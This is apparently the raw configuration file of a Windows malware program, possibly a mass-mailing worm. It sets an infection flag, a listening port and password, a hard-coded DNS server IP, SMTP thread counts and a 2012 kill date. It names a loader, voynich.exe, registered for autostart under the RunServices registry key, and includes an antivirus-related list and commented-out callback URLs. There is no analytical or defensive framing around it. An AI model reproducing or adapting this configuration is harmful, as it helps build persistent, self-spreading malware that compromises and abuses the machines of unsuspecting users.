[MainSettings]
Port=2012
Password=azag
MaxConnections=14
Version=2.012
DNSHost=195.20.105.149
DNSPort=53
MaxSmtpThreads=6
MaxSmtpAttemps=8
WorkUntilYear=2012
WorkUntilMonth=5
WorkUntilDay=5
TestVersion=2.012
Infect=1

[FileNames]
LoaderName=voynich.exe
BaseRegPath=HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
RegAutoKey=voynich.exe

[AntiVirus]
ScanTimeout=200
ssmarque.scr
;notepad.exe
;test.exe

;[Notify]
;Url=%s?p=%lu
;NotifyTimeout=10*1000
;http://localhost/script1.php
;http://localhost/script2.php
;http://localhost/script3.php
